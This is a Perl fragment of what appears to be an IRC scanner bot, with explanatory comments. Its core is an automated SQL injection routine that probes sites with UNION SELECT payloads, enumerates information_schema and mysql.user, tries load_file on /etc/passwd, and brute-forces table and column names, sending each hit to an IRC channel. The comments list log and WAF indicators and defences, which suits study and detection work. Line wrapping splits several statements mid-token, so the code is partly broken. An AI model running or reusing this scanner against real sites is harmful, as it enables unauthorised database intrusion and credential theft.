# query($url): minimal HTTP/1.0 client over a raw TCP socket.
# Splits $url into host and request path, connects to port 80 on the host,
# sends a GET with a fixed "Mozilla/5.0" User-Agent and returns everything read
# from the socket (status line and headers included). Returns "" when the
# connection fails, because errors inside the eval block are discarded.
sub query($) {
my $url = $_[0];
# Only the first "http://" is removed; nothing else in this sub strips a scheme.
$url =~ s/http:\/\///;
my $host = $url;
my $query = $url;
my $page = "";
$host =~ s/href=\"?http:\/\///;
# Keep the leading run of host characters and drop the first "/" and the rest.
$host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
# $host is interpolated as a regex pattern here, not as a literal string.
$query =~ s/$host//;
if ( $query eq "" ) { $query = "/"; }
eval {
# "or return" leaves the eval block only; the sub then returns the empty $page.
my $sock = IO::Socket::INET->new(PeerAddr => "$host", PeerPort => "80", Proto =>
"tcp") or return;
print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mo
zilla/5.0\r\n\r\n";
my @r = <$sock>;
# Interpolating the array joins the response lines with a space between them.
$page = "@r";
close($sock);
};
return $page;
}
# links($url): return three slash-terminated variants of $url, in this order:
# the URL itself, its host part, and the URL with its last path component
# removed. In each variant every "//" pair is replaced by "/" in one pass.
sub links() {
    my ($address) = @_;

    # Everything before the final "/" of the address.
    (my $parent_dir = $address) =~ s{(.*)/[^/]*$}{$1};
    # The first run of host characters that is followed by a "/".
    (my $site_root = $address) =~ s{([-a-zA-Z0-9.]+)/.*}{$1};

    my @variants;
    for my $candidate ($address, $site_root, $parent_dir) {
        (my $normalised = $candidate . '/') =~ s{//}{/}g;
        push @variants, $normalised;
    }
    return @variants;
}
# key($text): encode a search string for use in a query string. Spaces become
# "+", and : / & " , \ become their percent-encoded forms. Other characters are
# left untouched.
sub key() {
    my ($text) = @_;
    my %escape_for = (
        ' '  => '+',
        ':'  => '%3A',
        '/'  => '%2F',
        '&'  => '%26',
        '"'  => '%22',
        ','  => '%2C',
        '\\' => '%5C',
    );
    # None of the replacements contains a character from the class, so one
    # pass gives the same result as substituting the characters one by one.
    $text =~ s{([ :/&",\\])}{$escape_for{$1}}g;
    return $text;
}
# calculate(@items): collapse each run of slashes in every argument to a single
# "/" and return the arguments with duplicates removed, keeping the first
# occurrence. The substitution works through the @_ aliases, so the caller's
# values are modified too.
sub calculate {
    my %seen;
    my @unique;
    for my $entry (@_) {
        $entry =~ s{/+}{/}g;
        push @unique, $entry unless $seen{$entry}++;
    }
    return @unique;
}
# sqlbrute($site)
# Appends UNION SELECT probes to $site (expected to end where a numeric
# parameter value would go) with 1 to 20 columns, looking for the hex-encoded
# marker "loginpwnz" in the response. When it appears, the sub reports the
# matching query template to the IRC channel and then probes, in order,
# information_schema.tables, mysql.user, load_file() on a hex-encoded path
# (success test: "root:x:" in the response), and each table name in @tabele,
# calling tabelka() for tables that respond.
#
# Indicators for request logs and WAF rules, all literal in the code below:
#   "-1+union+select+0x6c6f67696e70776e7a", "information_schema.tables",
#   "mysql.user", "load_file(0x2f6574632f706173737764)", and a trailing "--".
# Parameterised queries remove the injection point; a database account without
# the FILE privilege and without read access to mysql.user limits what the
# later probes can return.
#
# NOTE(review): get() is presumably LWP::Simple's; the import is outside this
# part of the file. $column, $union, $inyection, $sql, $response, $loadfile and
# $loadcont are package globals, and $loadfile/$loadcont are never reset here.
# Several statements below are split mid-token by the page's line wrapping.
sub sqlbrute() {
my $site=$_[0];
my $columns=20;
# SQL comment terminator and the "+" used in place of spaces.
my $cfin.="--";
my $cmn.= "+";
for ($column = 0 ; $column < $columns ; $column ++)
{
# $union grows as ",1,2,..." and $inyection as one marker per extra column;
# both are cleared on the first pass.
$union.=','.$column;
$inyection.=','."0x6c6f67696e70776e7a";
if ($column == 0)
{
$inyection = '';
$union = '';
}
$sql=$site."-1".$cmn."union".$cmn."select".$cmn."0x6c6f67696e70776e7a".$inye
ction.$cfin;
$response=get($sql);
# The marker in the response means the column count matched and a column is
# reflected in the page.
if($response =~ /loginpwnz/)
{
# This increment also advances the loop counter of the enclosing for.
$column ++;
$sql=$site."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cfin;
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14SQL14)3 $sql ");
# Probe: can the account read information_schema.tables?
# "or die" ends the whole process when get() returns a false value.
$sql=$site."-1".$cmn."union".$cmn."select".$cmn."0x6c6f67696e70776e7a".
$inyection.$cmn."from".$cmn."information_schema.tables".$cfin;
$response=get($sql)or die("[-] Impossible to get Information_Schema\n")
;
if($response =~ /loginpwnz/)
{
$sql=$site."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cmn.
"from".$cmn."information_schema.tables".$cfin;
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14SQL14)(4
@14INFO_SCHEMA14)3 $sql ");
}
# Probe: can the account read mysql.user?
$sql=$site."-1".$cmn."union".$cmn."select".$cmn."0x6c6f67696e70776e7a".
$inyection.$cmn."from".$cmn."mysql.user".$cfin;
$response=get($sql)or die("[-] Impossible to get MySQL.User\n");
if($response =~ /loginpwnz/)
{
$sql=$site."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cmn.
"from".$cmn."mysql.user".$cfin;
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14SQL14)(4
@14USER14)3 $sql ");
}
else
{
}
# Build one load_file() call per remaining column.
while ($loadcont < $column-1)
{
$loadfile.=','.'load_file(0x2f6574632f706173737764)';
$loadcont++;
}
# Probe: does load_file() return file contents (FILE privilege)?
$sql=$site."-1".$cmn."union".$cmn."select".$cmn."load_file(0x2f657463
2f706173737764)".$loadfile.$cfin;
$response=get($sql)or die("[-] Impossible to inject LOAD_FILE\n");
if($response =~ /root:x:/)
{
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14SQL14)(4
@14Load File14)3 $sql ");
}

else
{
}
# Try each candidate table name from the global list @tabele (defined outside
# this part of the file).
foreach $tabla(@tabele)
{
chomp($tabla);
$sql=$site."-1".$cmn."union".$cmn."select".$cmn."0x6c6f67696e7
0776e7a".$inyection.$cmn."from".$cmn.$tabla.$cfin;
$response=get($sql)or die("[-] Impossible to ge
t tables\n");
if($response =~ /loginpwnz/)
{
$sql=$site."-1".$cmn."union".$cmn."select".$cmn."0".$union.$
cmn."from".$cmn.$tabla.$cfin;
sendraw($IRC_cur_socket, "PRIVMSG $chann
el :14,1(7@14SQL15)(4@14Tabel14)3 $sql ");
&tabelka($site,$tabla);
}
}
}
}
}
# tabelka($site, $table)
# For each candidate column name in the global list @kolumny (defined outside
# this part of the file), requests a UNION SELECT that concatenates the
# "loginpwnz" marker, ":" (0x3a) and the column from $table. Columns whose
# response contains the marker are reported to the IRC channel.
# The column padding comes from the global $inyection as sqlbrute() left it, so
# this sub depends on being called from there.
# In request logs this shows up as "concat(0x6c6f67696e70776e7a,0x3a,<name>)".
sub tabelka() {
my $site=$_[0];
my $tabla=$_[1];
my $cfin.="--";
my $cmn.= "+";
chomp($tabla);
foreach $columna(@kolumny)
{
chomp($columna);
$sql=$site."-1".$cmn."union".$cmn."select".$cmn."concat(0x6c6f67696
e70776e7a,0x3a,$columna)".$inyection.$cmn."from".$cmn.$tabla.$cfin;
# "or die" ends the whole process when get() returns a false value.
$response=get($sql)or die("[-] Impossible to get columns\n");
if ($response =~ /loginpwnz/)
{
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7
@14SQL15) (7@14SQLi Vuln14)3 $site 14(4@14Kolom14)3 $columna 14(4@14Tabel14)3 $tabla ");
}
}
}
# nick($name): send an IRC NICK command. Does nothing unless called with
# exactly one argument.
sub nick {
    return if @_ != 1;
    my ($new_nick) = @_;
    return sendraw("NICK $new_nick");
}
# notice($target, $text): send an IRC NOTICE. Does nothing unless called with
# exactly two arguments.
sub notice {
    return if @_ != 2;
    my ($recipient, $text) = @_;
    return sendraw("NOTICE $recipient :$text");
}
# join($channel): send an IRC JOIN command for the given channel.
sub join {
    my ($room) = @_;
    return sendraw("JOIN $room");
}
# part($channel): send an IRC PART command for the given channel.
sub part {
    my ($room) = @_;
    return sendraw("PART $room");
}

# quit($message): send an IRC QUIT command with the given text, then end the
# process.
sub quit {
    my ($farewell) = @_;
    sendraw("QUIT $farewell");
    exit;
}
